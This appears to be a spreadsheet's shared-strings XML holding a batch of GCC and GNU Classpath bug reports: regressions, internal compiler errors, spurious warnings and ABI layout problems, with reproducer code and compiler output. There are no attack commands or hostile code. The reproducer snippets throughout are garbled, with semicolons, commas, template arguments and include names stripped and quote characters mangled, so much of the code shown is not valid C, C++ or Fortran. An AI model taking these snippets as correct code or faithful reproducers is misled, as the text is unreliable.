    <t>[4.2 Regression] new (within last few days) infinite loop with -O1</t>
  </si>
  <si>
    <t>gcc infloops with -O1 (but not -O -Os -O2 or -O3) given the following input.
Note that this happens using gcc built from svn a few hours ago that it is
also reproducible with a two-day-old binary but not with one from 2006-02-04.
$ cat xnanosleep.c
void
xnanosleep (_Bool overflow)
{
  struct { int tv_nsec } ts_sleep
  if (0 &lt;= ts_sleep.tv_nsec)
    overflow |= 1
  for ()
    {
      if (overflow)
        ts_sleep.tv_nsec = 0
      if (foo (ts_sleep))
        break
    }
}
$ time gcc -v -O1 xnanosleep.c 2&gt; /t/err
gcc -v -O1 xnanosleep.c 2&gt; /t/err  0.00s user 0.00s system 0% cpu 5.106 total
[Exit 130 (INT)]
$ cat /t/err
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: /mirror/d/gcc/configure --disable-nls --prefix=/p/p/gcc-2006-02-10.10h41 --disable-multilib --enable-languages=c
Thread model: posix
gcc version 4.2.0 20060210 (experimental)
 /nobak/p/p/gcc-2006-02-10.10h41/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.2.0/cc1 -quiet -v -iprefix /nobak/p/p/gcc-2006-02-10.10h41/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.2.0/ xnanosleep.c -quiet -dumpbase xnanosleep.c -mtune=generic -auxbase xnanosleep -O1 -version -o /t/cc9XDV6L.s
ignoring nonexistent directory /nobak/p/p/gcc-2006-02-10.10h41/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.2.0/../../../../x86_64-unknown-linux-gnu/include
ignoring duplicate directory /p/p/gcc-2006-02-10.10h41/lib/gcc/x86_64-unknown-linux-gnu/4.2.0/include
ignoring nonexistent directory /p/p/gcc-2006-02-10.10h41/lib/gcc/x86_64-unknown-linux-gnu/4.2.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /nobak/p/p/gcc-2006-02-10.10h41/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.2.0/include
 /usr/local/include
 /p/p/gcc-2006-02-10.10h41/include
 /usr/include
End of search list.
GNU C version 4.2.0 20060210 (experimental) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.2.0 20060210 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: ddb06f39f2f5fb93ee768a85a3be125e</t>
  </si>
  <si>
    <t>list+gcc-bugzilla</t>
  </si>
  <si>
    <t>GCC-16555</t>
  </si>
  <si>
    <t xml:space="preserve">Diagnostic shows  instead of </t>
  </si>
  <si>
    <t>I've tried a while to get a simpler case but no luck. Sorry here's the original</t>
  </si>
  <si>
    <t>GCC-68844</t>
  </si>
  <si>
    <t>[6 regression] gcc.dg/tree-ssa/ssa-dom-thread-4.c fails since r228306</t>
  </si>
  <si>
    <t>Created attachment 36986
dom1 dump from r228305
The subject test case has been failing as follows:
FAIL: gcc.dg/tree-ssa/ssa-dom-thread-4.c scan-tree-dump-times dom1 Threaded 4
since r228306 which is:
2015-09-30  Jeff Law  
        * tree-ssa-dom.c (optimize_stmt): Collapse control flow statements
        with constant conditions.
        * tree-ssa-threadupdate.c (remove_jump_threads_starting_at): New.
        (remove_ctrl_stmt_and_useless_edges): No longer static.
        * tree-ssa-threadupdate.h (remove_jump_threads_starting_at): Prototype.
        (remove_ctrl_stmt_and_useless_edges): Likewise.
My guess is that the test case just needs adjusting because the control flow has changed sufficiently to remove some jump-threading opportunities but I'm not familiar enough with the code to be sure.  Jeff would you mind taking a quick look?
The removed threaded jumps are:
  Threaded jump 15 --&gt; 3 to 22
  Threaded jump 5 --&gt; 18 to 23
  Threaded jump 7 --&gt; 18 to 23
Attaching the dom1 dumps from r228305 and r228306.
Apologies if this is a known issue but I couldn't find a PR open on it.</t>
  </si>
  <si>
    <t>GCC-6244</t>
  </si>
  <si>
    <t>failure to execute programs which are compiled with gcj due to loader problems</t>
  </si>
  <si>
    <t>I noticed that in the libjava testsuite all the execution tests were failing
A quick look in the log gives the following message repeated
once for each execution test.
/sbin/loader: Fatal Error: lazy_text_resolve: symbol malloc should not have any relocation entry
This is beyond my knowledge of things so have no idea what
I should be looking at in order to fix this.
Release:
3.2 CVS
Environment:
alphaev56-dec-osf4.0d</t>
  </si>
  <si>
    <t>GCC-10513</t>
  </si>
  <si>
    <t>Annoying warning</t>
  </si>
  <si>
    <t>When compiling the below source file ('g++ dummy.cpp') I obtain this message :
---
dummy.cpp:9:14: warning: pasting :: and i does not give a valid preprocessing token
---
This happend with all gcc 3.x releases. It doesn't happend with the gcc releases prior to 3.x and other compilers (Borland C++ Visual C++ Metrowerks CodeWarrior) don't issue this warning.
I'm not really sure if this is a bug but if not can you say me what's wrong ?
Thanks !
--- Begin of dummy.cpp source file ---
namespace n {
	int i
}
#define M(a)	a##i
int main( void )
{
	M(n::) = 42	// The line which produces the preprocessor warning.
	return 0
}
--- End of dummy.cpp source file ---
Release:
gcc version 3.2 20020927 (prerelease)
Environment:
Cygwin or GNU/Linux
How-To-Repeat:
g++ dummy.cpp</t>
  </si>
  <si>
    <t>csimon</t>
  </si>
  <si>
    <t>CLASSPATH-26762</t>
  </si>
  <si>
    <t>Modal Swing dialogs broken</t>
  </si>
  <si>
    <t>Opening a modal Swing dialog from the event queue (i.e. in response to a user pressing a button or selecting a menu item) does not work. This is due to the eventqueue beeing blocked by executing the action. When a modal dialog should be opened there must be a new eventqueue stacked upon the blocked one.</t>
  </si>
  <si>
    <t>GCC-462</t>
  </si>
  <si>
    <t>During creation of hello world program g++ had an internal error and instructed me to sumbit a full bug report.</t>
  </si>
  <si>
    <t>I was about to create a prime factorization program but I
usually create the needed header file and make a hello
world program to test that everything is working correctly.
At the time I was running mpg123(ver. 0.59r).  When I ran
make g++ returned the message in error.log.  I then ran
make again and redirected the output to a file with the
same result.  After that I rebooted into kernel 2.2.12 and
tried unsuccesfully to get online.  When I booted back into
kernel 2.4.0-test4 I was unable to reproduce the problem
even after I had restarted mpg123 with the same
configuration as before.
Release:
g++ and gcc ver 2.95.2
Environment:
OS: Debian GNU/Linux 2.2 (Potato) Laptop: Toshiba Satellite 2775XDVD Kernel: 2.4.0-test4 Specs: 64 mb mem 128 mb swap 7.4 gb hd 1.7 gb used Oddities: most development libraries from unstable branch
How-To-Repeat:
[nathan 13 aug 2000]
There is too little information to reporduce the problem.</t>
  </si>
  <si>
    <t>fepsftwrdevgroup</t>
  </si>
  <si>
    <t>GCC-65092</t>
  </si>
  <si>
    <t>Container adaptors missing allocator-extended constructors</t>
  </si>
  <si>
    <t>The allocator-extended constructors of std::stack std::queue and std::priority_queue are missing.</t>
  </si>
  <si>
    <t>GCC-81589</t>
  </si>
  <si>
    <t>Possible False-Positive with decltype</t>
  </si>
  <si>
    <t>I can confirm that this effects GCC-8.0 svn as well (have not tested with GCC-6).
There's a header file which compiles just fine with GCC-5.4.0 (and GCC-4.9.4) but fails to compile with GCC-7.1.1 and GCC-8.0.
Please note that I'm only reporting this because of the inconsistency.
error: decltype cannot resolve address of overloaded function
The problematic line is reported as this one:
using arguments = typename tuple_tail&lt;
  typename function_traits&lt;decltype&lt; 
In this context:
#include 
#include 
#include 
namespace rclcpp
{
namespace runction_traits
{
template
struct tuple_tail
template
struct tuple_tail&gt;
{
  using type = std::tuple
}
// std::function
template
struct function_traits
{
  using arguments = typename tuple_tail&lt;
      typename function_traits&lt;decltype( 
  static constexpr std::size_t arity = std::tuple_size::value
  template
  using argument_type = typename std::tuple_element::type
  using return_type = typename function_traits&lt;decltype( 
}
/* other structs follow */
}
}
I'll attach the precompiler output from my computer with GCC 8 on it.
I'll also note that our library rclcpp does compile with GCC 8 but when we try to compile our tests or use the library elsewhere the compiler throws errors.
I'm super hesitant in reporting this but I just can't see anything wrong in the code and the inconsistency is certainly an issue. It should error in GCC 5.4 if it's bad code (also note that the code is being compiled with the same standard C++-14).</t>
  </si>
  <si>
    <t>hallen</t>
  </si>
  <si>
    <t>GCC-79159</t>
  </si>
  <si>
    <t>[7 regression] spurious array-bounds warning</t>
  </si>
  <si>
    <t>hi -
gcc version 7.0.0 20170119 gives what appears to be a spurious warning
for this example when compiling with -O3 (tested on x86_64-pc-linux-gnu):
================================================================
void foo(float tmpCorr[9][9])
float bar
void finalDigits(int&amp; n)
{
  float tmpCorr[9][9] = {{0}}
  foo(tmpCorr)
  for (int i = 0 i &lt; n i++) {
    for (int j = i+1 j &lt; n j++) {
      bar = tmpCorr[i][j]
    }
  }
}
================================================================
$ ~/gcc/build/gcc/cc1plus -quiet  -O3 -Wall x.cc
x.cc: In function â€˜void finalDigits(int&amp;)â€™:
x.cc:11:25: warning: array subscript is above array bounds [-Warray-bounds]
       bar = tmpCorr[i][j]
             ~~~~~~~~~~~~^
I do not see this warning with gcc 6.3.1.
This doesn't make sense since there is no basis for making any assumptions
about the value of the iteration limit n.
The warning goes away if i remove the call to foo() if function parameter
is changed to be passed by value rather than by reference or if the lower
limit of the j iteration is changed to i rather than i+1.</t>
  </si>
  <si>
    <t>CLASSPATH-21635</t>
  </si>
  <si>
    <t>GLib-GObject-WARNING with jython</t>
  </si>
  <si>
    <t>executing the below code snippet in jython:
gcc version 4.0.1 20050508 (prerelease) (Debian 4.0.0-6)
Jython 2.1
import javax.swing as swing
win = swing.JFrame(JYTHON)
win.size = (100 100)
win.show()
and closing the window from the window manager results in the following:
(.:29481): GLib-GObject-WARNING **: invalid uninstantiatable type `' in
cast to `GtkWidget'
(.:29481): Gtk-CRITICAL **: gtk_widget_hide: assertion `GTK_IS_WIDGET (widget)'
failed
Seems that the frames peer widget is destroyed. 
This - closing the window from the window manager nad showing again - works 
with sun jdk 1.5_03.</t>
  </si>
  <si>
    <t>sbodomerle</t>
  </si>
  <si>
    <t>GCC-13115</t>
  </si>
  <si>
    <t>[ABI] wrong class hierarchy</t>
  </si>
  <si>
    <t>using g++ version 3.2.2 and 3.3 for the following testcase:
struct A { }
struct B : public virtual A {
    virtual double f()
}
struct C : public A { }
struct D : public A {
    virtual double f()
}
struct E: public B virtual public C { }
struct F: virtual public D public virtual C {
    int fi
}
struct G : public E public F public virtual C { }
double B::f(){return 0.0}
double D::f(){return 0.0}
int main(void) {
    G g
    return 0
}
using g++ -fdump-class-hierarchy t.C command we got the following class layout 
for class G:
Class G
   size=20 align=4
G (0x4009ad40) 0
    vptridx=0 vptr=((&amp;G::_ZTV1G) + 20)
  E (0x4009ad80) 0 nearly-empty
      primary-for G (0x4009ad40)
      subvttidx=4
    B (0x4009ae40) 0 nearly-empty
        primary-for E (0x4009ad80)
        subvttidx=8
      A (0x4009ae80) 0 empty virtual canonical
          vbaseoffset=-12
    C (0x4009adc0) 16 empty virtual canonical
        vbaseoffset=-16
      A (0x4009ae00) 16 empty
  F (0x4009aec0) 4
      subvttidx=12 vptridx=20 vptr=((&amp;G::_ZTV1G) + 44)
    D (0x4009af80) 4 nearly-empty virtual canonical
        primary-for F (0x4009aec0)
        vptridx=24 vbaseoffset=-20
      A (0x4009afc0) 4 empty
    C (0x4009af00) 16 empty virtual non-canonical
      A (0x4009af40) 16 empty
  C (0x400a4000) 16 empty virtual non-canonical
      vbaseoffset=-16
    A (0x400a4040) 16 empty
This is wrong because F and D are at offset 4 then at offset 8 should be F's 
data member fi then there is 4 bytes unused space and then C is put at offset 
16. 
With g++ -fabi-version=2 -fdump-class-hierarchy t.C command we got a different 
class layout for G:
Class G
   size=16 align=4
G (0x4817c0) 0
    vptridx=0 vptr=((&amp;G::_ZTV1G) + 20)
  E (0x481800) 0 nearly-empty
      primary-for G (0x4817c0)
      subvttidx=4
    B (0x4818c0) 0 nearly-empty
        primary-for E (0x481800)
        subvttidx=8
      A (0x481900) 0 empty virtual canonical
          vbaseoffset=-12
    C (0x481840) 12 empty virtual canonical
        vbaseoffset=-16
      A (0x481880) 16 empty
  F (0x481940) 4
      subvttidx=12 vptridx=20 vptr=((&amp;G::_ZTV1G) + 44)
    D (0x481a00) 4 nearly-empty virtual canonical
        primary-for F (0x481940)
        vptridx=24 vbaseoffset=-20
      A (0x481a40) 4 empty
    C (0x481980) 12 empty virtual non-canonical
      A (0x4819c0) 12 empty
  C (0x481a80) 12 empty virtual non-canonical
      vbaseoffset=-16
    A (0x481ac0) 12 empty
This time C is put at offset 12 but G's E's C's A object is put at offset 16 
and  G's F's C's A is put at offset 12 so is G's C's A is also at offset12. 
This is wrong since these A should be the same A object.</t>
  </si>
  <si>
    <t>yanliu</t>
  </si>
  <si>
    <t>GCC-36633</t>
  </si>
  <si>
    <t>[4.4 Regression] warning array subscript is below array bounds on delete [] with -O2 -Wall</t>
  </si>
  <si>
    <t>When deleting an array of dynamically allocated objects that inherit some base class a pointer offset calculation is modified during the optimization process of a delete [] operator. The result is a subscript operation with a negative index and this causes the warning to be emitted (erroneously I believe).
This was determined by analyzing the tree dump.
The file move_array.cpp.059t.dce2 has this code:
D.2208_15 = D.2171_6 + -8
operator delete [] (D.2208_15)
turn into this in move_array.cpp.060t.forwprop2:
D.2208_15 = 
operator delete [] (D.2208_15)</t>
  </si>
  <si>
    <t>GCC-40452</t>
  </si>
  <si>
    <t>-fbounds-check: False positive due to ignoring storage association</t>
  </si>
  <si>
    <t>Follow up to PR 37746 / PR 40383. I believe the following program is valid due to the storage association/argument association. However with -fcheck=bounds one gets:
At line 5 of file aa.f90
Fortran runtime error: Actual string length is shorter than the declared one for dummy argument 'a' (2/4)
Note: If one changes the actual argument to [ab] or [ab] both NAG f95 and gfortran are able to diagnose the problem at compile time. For the program below neither compilers gives a compile-time error/warning. (Nor does NAG with -C=all give a run-time error.)
program test
  implicit none
  call sub([ab cd])
contains
  subroutine sub(a)
   character(len=4) :: a(1)
   print * a(1)
  end subroutine sub
end program test
From the standard (F2003 cf. 16.4.3 Storage association):
In a storage association context [...] (3) A nonpointer scalar object of type default character and character length len occupies len contiguous character storage units [...] (7) A nonpointer array occupies a sequence of contiguous storage sequences one for each array element in array element order (6.2.2.2) [...] A sequence of storage sequences forms a storage sequence.
(And a bit further down one finds a bit more to argument association.)
The challenge is diagnose this properly. The problem is that the array size is _not_ passed. One solution would be to enable the check only with -std=f95. I believe the argument association is only allowed since Fortran 2003. Or one does a proper argument checking by checking whether the argument is an array. For this one needs -fcheck=call and save the arguments in some external variable then one checks whether the current procedure matches the procedure where the global variable stores the argument information - and then uses this information for the array check. Sorry I don't have any better idea at the moment.
Note: The primary use of the argument association is:
  call c_func(abc)
with
  subroutine c_func(str) bind(C)
    character(len=1kind=c_char) :: str(*)
as otherwise one had to use 'call c_func([abc])' which is awkward!</t>
  </si>
  <si>
    <t>GCC-80415</t>
  </si>
  <si>
    <t>[7 Regression]  bogus invalid initialization of reference error</t>
  </si>
  <si>
    <t>LLVM trunk doesn't build anymore with gcc-7:
 % cat Arg.ii
struct A {
  A(int int const int (
}
A fn1() { return {0 0} }
 % g++ -c Arg.ii
Arg.ii: In function â€˜A fn1()â€™:
Arg.ii:4:23: error: invalid initialization of reference of type â€˜const int (&amp;)[0]â€™ from expression of type â€˜const int [0]â€™
 A fn1() { return {0 0} }
                       ^
Arg.ii:2:3: note: in passing argument 3 of â€˜A::A(int int const int (&amp;)[0])â€™
   A(int int const int (
   ^</t>
  </si>
  <si>
    <t>GCC-80909</t>
  </si>
  <si>
    <t>auto-profile.c possible mismatching parentheses in MACRO</t>
  </si>
  <si>
    <t>Line 358 in (gcc/)auto-profile.c:
'if (LOCATION_LOCUS (BLOCK_SOURCE_LOCATION (block) == UNKNOWN_LOCATION))'
should probably be:
                                                  ^                    ^ 
'if (LOCATION_LOCUS (BLOCK_SOURCE_LOCATION (block)) == UNKNOWN_LOCATION)'</t>
  </si>
  <si>
    <t>avshash</t>
  </si>
  <si>
    <t>GCC-19479</t>
  </si>
  <si>
    <t>UBOUND causes ICE</t>
  </si>
  <si>
    <t>subroutine fft(tab)
  type fft_tab_type  
     complex dimension(:) pointer :: omega
  end type fft_tab_type
  type(fft_tab_type) intent(in) :: tab
  i = ubound(tab%omega1)
end subroutine fft
cd /home/lei/SPEC2004/benchspec/CPU2004/459.GemsFDTD/run/00000001/
~/gcc/bin/gfortran -O0 -c bugreport.f90
bugreport.f90:0: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>GCC-8746</t>
  </si>
  <si>
    <t>[3.2 regression] gcc miscompiles Linux kernel ppa driver on x86</t>
  </si>
  <si>
    <t>This bug affects the ppa driver (used by Iomega Zip drive connected to parallel port) taken from Linux kernel 2.4.19 source tree (drivers/scsi/ppa.c) when compiled with optimization turned on.
I can reproduce it with gcc versions 3.1.1 3.2 3.2.1 but not with version 2.95.3. I haven't tested other versions of gcc but I think any version newer than 2.95.3 is affected.
Close to the end of function int ppa_completion(...) there is a check whether the zip drive is ready. This test fails always due to wrong code generation and causes the driver to spend a lot of time on waiting. Transfer rate drops down from &gt;450 kB/s to ~50 kB/s.
The affected code is:
   ...
   unsigned char r
   ...
   /* Now check to see if the drive is ready to communicate */
   r = (r_str(ppb) 
   /* If not drop back down to the scheduler and wait a timer tick */
   if (!(r &amp; 0x80))
      return 0
   ...
What actually happens is:
1.) Read state byte from parport.
2.) Mask out lower nibble.
3.) Check the MSB (ready bit) of the byte read.
gcc translates this to:
1.) Read state byte into register al (8 bit).
2.) Apply bit-mask to register eax (32 bit supersetting al).
3.) Check whether the processors sign-flag (which corresponds to the MSB) is set. Code generation for (r &amp; 0x80) is omitted.
But since 0xf0 is applied to eax the sign-flag depends on bit 31 (which will always be cleared) rather than on bit 7 (the bit of interest).
Release:
gcc releases since 3.1.1 (at least)
Environment:
i586-linux-gnu kernel 2.4.19-SMP</t>
  </si>
  <si>
    <t>chaus</t>
  </si>
  <si>
    <t>GCC-56387</t>
  </si>
  <si>
    <t>Alias of class template wrongly seen as different</t>
  </si>
  <si>
    <t>Created attachment 29490
Minimal test case
The attached minimal test case creates an alias template of a variadic class template. A function foo2 fails to unify a template template parameter C when given two arguments created using both forms - but only if the object created using the alias template is passed to a parameter expecting a reference. An online 4.8.0 compiler also failed.
g++ -c -std=c++11 -Wall -Wextra gcc472templatetemplatebug.cpp
The code and error are also listed below:
template 
struct is1 {}
template 
using is2 = is1
template  class C int ...Is int ...Js&gt;
void foo1(C a C  b) {}
template  class C int ...Is int ...Js&gt;
void foo2(C a C &amp;b) {}   // !
void test()
{
  is1 x
  is2 y
  foo1(xy)
  foo2(xy)
}
//         Now the error messages:
cc472templatetemplatebug.cpp: In function â€˜void test()â€™:
gcc472templatetemplatebug.cpp:18:11: error: no matching function for call to â€˜foo2(is1&amp; is2&amp;)â€™
gcc472templatetemplatebug.cpp:18:11: note: candidate is:
gcc472templatetemplatebug.cpp:11:6: note: template &gt; class C int ...Is int ...Js&gt; void foo2(C C&amp;)
gcc472templatetemplatebug.cpp:11:6: note:   template argument deduction/substitution failed:
gcc472templatetemplatebug.cpp:18:11: note:   deduced conflicting types for parameter â€˜Câ€™ (â€˜template struct is1â€™ and â€˜template&lt;int .
..Is&gt; using is2 = is1â€™)
gcc472templatetemplatebug.cpp: In instantiation of â€˜void foo1(C C) [with C = is1 int ...Is = {1 2 345} int ...Js = {6 78 90}]â€™:
gcc472templatetemplatebug.cpp:17:11:   required from here
gcc472templatetemplatebug.cpp:8:6: warning: unused parameter â€˜aâ€™ [-Wunused-parameter]
gcc472templatetemplatebug.cpp:8:6: warning: unused parameter â€˜bâ€™ [-Wunused-parameter]</t>
  </si>
  <si>
    <t>CLASSPATH-22706</t>
  </si>
  <si>
    <t>java.awt.geom.GeneralPath constructor sometimes hangs</t>
  </si>
  <si>
    <t xml:space="preserve">When constructing a GeneralPath with a Shape argument the code can enter an endless loop. Please refer to the attached Mauve test case.
On Sun J2SE 1.4.1_01 the test runs successfully. On Classpath cvs 2003-10-20 the code hangs in check #2 of the check point GeneralPath(Shape) which does the following:
  new GeneralPath(Rectangle2D.Double)
</t>
  </si>
  <si>
    <t>GCC-8420</t>
  </si>
  <si>
    <t>volatile after the type specifier for an unnamed structure is rejected</t>
  </si>
  <si>
    <t>This source file is rejected:
struct a {
	struct  { int x } volatile a
}  /* OK */
struct b {
	volatile struct  { int x } 
}  /* OK */
struct c {
	struct  { int x } volatile
}  /* ERROR */
theseus$ gcc -Wall -c t.c
t.c:10: unnamed fields of type other than struct or union are not allowed
This code is made up to demonstrate a problem found while reading the
source: grokfield is called for a field declaration without an identifier
and tries to check that the field type is a structure or union.
However grokfield assumes that the type specifier is the first element
in the list passed as declspecs which is not necessarily true.
Given the other two examples (struct a and struct b) which are accepted
this code should probably be legal. Even if it is illegal the error message
is wrong.
Release:
gcc-3.2
Environment:
theseus$ uname -a
SunOS theseus 5.9 Generic_112233-02 sun4u sparc SUNWUltra-4
theseus$ gcc -v
Reading specs from /usr/local/bin/../lib/gcc-lib/sparc-sun-solaris2.9/3.2/specs
Configured with: /export/local/manager/playground/ULMgcc32/src/gcc-3.2/configure --with-ld=/usr/local/bin/ld --with-gnu-ld --with-as=/usr/local/bin/as --with-gnu-as --prefix=/usr/local/
Thread model: posix
gcc version 3.2
How-To-Repeat:
See description above.</t>
  </si>
  <si>
    <t>GCC-79382</t>
  </si>
  <si>
    <t>DTIO ICE</t>
  </si>
  <si>
    <t>Created attachment 40671
g_bug.f90 complete program
DTIO ICE
$ gfortran --version
GNU Fortran (GCC) 7.0.1 20170122 (experimental)
Walt@HP_Envy /cygdrive/c/walt/ZHI/FC/FC_Code/Dollar_Bug
$ gfortran -Wall -Wextra g_bug.f90
f951.exe: internal compiler error: gfc_get_default_type(): Bad symbol '_dtio_formatted_write'
libbacktrace could not find executable to open
Note: Things seem to work using an interface block
rather than GENERIC ::</t>
  </si>
  <si>
    <t>walt.brainerd</t>
  </si>
  <si>
    <t>GCC-7192</t>
  </si>
  <si>
    <t>build failed in gcc/cp/pt.c</t>
  </si>
  <si>
    <t xml:space="preserve">	The cvs-co from 2002/07/03 breaks with:
	cp/pt.o: In function `instantiate_class_template':
	/bigspace/build/compile/gcc/../../gcc/gcc/cp/pt.c:5254: undefined reference to `incomplete_type_error'
	This seems correct because grep can only find cxx_incomplete_type_error
Release:
3.2 20020604 (experimental)
Environment:
System: Linux drcomp 2.4.18 #13 Sun Mar 3 13:22:15 CET 2002 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --enable-threads --enable-languages=cc++ada
How-To-Repeat:
	Compile gcc-3.2-20020703 with C++</t>
  </si>
  <si>
    <t>GCC-19608</t>
  </si>
  <si>
    <t>ICE after friend function definition in local class</t>
  </si>
  <si>
    <t>bash-2.05b$ cat friend.c
void f ()
{
  class c
    {
      friend void g () { }
    }
}
bash-2.05b$ ./cc1plus friend.c
 void f()
friend.c:5: error: can't define friend function â€˜gâ€™ in a local class definition
 void g()
friend.c: At global scope:
friend.c:6: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
bash-2.05b$ ./cc1plus --version
GNU C++ version 4.0.0 20050124 (experimental) (sh-elf)
        compiled by GNU C version 3.2.3 20030502 (Red Hat Linux 3.2.3-42).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
I gte the same error with an i686-targted compiler from an August snapshot.</t>
  </si>
  <si>
    <t>GCC-48464</t>
  </si>
  <si>
    <t>[4.7 Regression] @171649: ICE in setup_pressure_classes at ira.c:877</t>
  </si>
  <si>
    <t>Hi!
The large IRA merge (=66d9a7b9e8a0c85a51467330f51ead74e77b7eb8 in GIT) broke the vax-linux target:
jbglaw@jbarbeitsplatz:/mnt/nfs-programming/toolchain/gcc-build/gcc$ ./xgcc -B . -c foo.c
foo.c:1:0: internal compiler error: in setup_pressure_classes at ira.c:877
Please submit a full bug report
[...]
jbglaw@jbarbeitsplatz:/mnt/nfs-programming/toolchain/gcc-build/gcc$ cat foo.c                                       
extern int xx (int a int b)
int
blub (double boo int oo)           
{
long x
x = boo * oo
x += xx (boo oo)
return x
}
This is just configured with ../gcc/configure --target=vax-linux --enable-languages=c --disable-threads on a i686-linux host/build system.</t>
  </si>
  <si>
    <t>jbglaw</t>
  </si>
  <si>
    <t>GCC-6498</t>
  </si>
  <si>
    <t>gcc failed in compiling a file from qmail-1.03</t>
  </si>
  <si>
    <t>[root@ns1 qmail-1.03.2]# gcc -O2 -save-temps -c timeoutconn.c             
gcc: Internal error: Segmentation fault (program cpp0)
Please submit a full bug report.
See  for instructions.
Release:
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
Environment:
gcc version 2.96 20000731 (Red Hat Linux 7.0)</t>
  </si>
  <si>
    <t>yewnam</t>
  </si>
  <si>
    <t>GCC-7773</t>
  </si>
  <si>
    <t>compilation problem in gcc/java/parse*.c</t>
  </si>
  <si>
    <t>Both parse.c and parse-scan.c after running configure contain lots of references to /home/mitchell/yaddayadda/parse.y that cause failures at compile-time.
Release:
gcc-3.2
Environment:
Solaris 2.6 gcc 2.95.2 bison 1.35 binutils 2.13
How-To-Repeat:
Download source tarball. Unpack. On a Solaris 2.6 SPARC machine (or potentially others don't know) run a 'configure --prefix=/my/favorite/gcc-3.2 gmake' wait for a bit and look for the errors whining about /home/mitchell to come spilling out.</t>
  </si>
  <si>
    <t>lanclos</t>
  </si>
  <si>
    <t>GCC-14868</t>
  </si>
  <si>
    <t>[3.4 only] ICE with -msse2 -mfpmath=sse -fnon-call-exceptions</t>
  </si>
  <si>
    <t>I originally triggered this compiling on a SL9 opteron but i was able
to reproduce it on x86 by enabling sse:
&gt; /dept/rnd/vendor/gcc-3.4pre/bin/g++ -fnon-call-exceptions -msse2 -mfpmath=sse
-O -c foo.C
foo.C: In member function `Matrix44 Matrix44::gjInverse(bool) const [with
T = double]':
foo.C:161:   instantiated from here
foo.C:158: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
&gt; /dept/rnd/vendor/gcc-3.4pre/bin/g++ -v
Reading specs from
/dept/rnd/vendor/gcc-3.4-20040225/lib/gcc/i686-pc-linux-gnu/3.4.0/specs
Configured with: ../gcc-3.4-20040225/configure
--prefix=/dept/rnd/vendor/gcc-3.4-20040225 --enable-threads --enable-languages=cc++
Thread model: posix
gcc version 3.4.0 20040225 (prerelease)
my 3.4 build isn't the most up to date but this also crashes 3.3.2 and 3.3.3.
-nick</t>
  </si>
  <si>
    <t>GCC-4300</t>
  </si>
  <si>
    <t>File gthr-pthreads.h missing</t>
  </si>
  <si>
    <t>Missing include file - gthr-pthreads.h
Release:
3.0.1
Environment:
slackware 8.0 linux
How-To-Repeat:
configure gcc-3.0.1 with --enable-threads=pthreads and make bootstrap</t>
  </si>
  <si>
    <t>johnnynorbeck</t>
  </si>
  <si>
    <t>GCC-3284</t>
  </si>
  <si>
    <t>libstdc++-3 boot problem</t>
  </si>
  <si>
    <t>The generated gthr.h macros are incorrect probably due to a sed problem.
Release:
3.0
Environment:
Mandrake 8.0 kernel 2.4.3 gcc-2.96 binutils 2.10.1glib 1.2.10
glibc 2.2.2 sed-3.02-12.
How-To-Repeat:
simply issuing a make bootstrap after configure on any Mandrake 8.0 system.</t>
  </si>
  <si>
    <t>mailus</t>
  </si>
  <si>
    <t>GCC-40687</t>
  </si>
  <si>
    <t>[C++0x]: error with auto and 7.1.6.4/7 in N2914</t>
  </si>
  <si>
    <t>Hi 
I think there is a bug in g++ 4.4 concerning the implementation of auto.
7.1.6.4/7 in N2914
The following program compiles but it should be rejected by g++.
int main() 
{
    auto i = 10 d = 5.0 // error! shall not compile in C++0x
    return 0
}
$ /opt/gcc-4.4/bin/g++ -v
Using built-in specs.
Target: i686-pc-cygwin
Configured with: ./configure --prefix=/opt/gcc-4.4
Thread model: single
gcc version 4.4.0 (GCC)
$ /opt/gcc-4.4/bin/g++ --std=c++0x -Wall g++4.4BugAutoN2914.cpp
g++4.4BugAutoN2914.cpp: In function 'int main()':
g++4.4BugAutoN2914.cpp:4: warning: unused variable 'i'
g++4.4BugAutoN2914.cpp:4: warning: unused variable 'd'</t>
  </si>
  <si>
    <t>GCC-21833</t>
  </si>
  <si>
    <t>simd tests fail in 3.4.4 but not in 3.3.6 or 4.0.1</t>
  </si>
  <si>
    <t>Note: AFAIKS this is NOT a problem reated to stack alignment (as in
10395) but to missing instructions.  This one IS similar to 11802 (if
not a duplicate) but if it is that one was erroneously marked as
duplicate of 10395.
Compiling simd-1.c with -O0 -march=pentium3 and running the resulting
executable yields abort() being called and a core being thrown.
Analysing the core the following suggests the assignment to res in
L35 being incomplete (what causes the subsequent verify() to fail):
(gdb) p k
$2 = {160 113 170 230}
(gdb) p res
$3 = {v = {160 113 0 0} i = {160 113 0 0}}
(gdb) x/20d &amp;i
0x8049ae0 :	150	100	150	200
0x8049af0 :	10	13	20	30
0x8049b00 :	0	0	0	0
0x8049b10 :	160	113	170	230
0x8049b20 :	160	113	0	0
The following assembler code is generated:
	.loc 1 34 0
	movq	i %mm0
	paddd	j %mm0
	movq	%mm0 k
	movq	i+8 %mm0
	paddd	j+8 %mm0
	movq	%mm0 k+8
	.loc 1 35 0
	movdqa	k %xmm0
	movdqa	%xmm0 res
	.loc 1 37 0
gcc 3.3.6 generates the following code (which works):
        .loc 1 34 0
        movq    i %mm0
        paddd   j %mm0
        movq    %mm0 k
        movq    i+8 %mm0
        paddd   j+8 %mm0
        movq    %mm0 k+8
        .loc 1 35 0
        movaps  k %xmm0
        movaps  %xmm0 res
I do not know the difference between these two instructions (movdqa
vs. movaps) but to me it seems gcc 3.4.4 selects the wrong one.</t>
  </si>
  <si>
    <t>tg42</t>
  </si>
  <si>
    <t>GCC-16401</t>
  </si>
  <si>
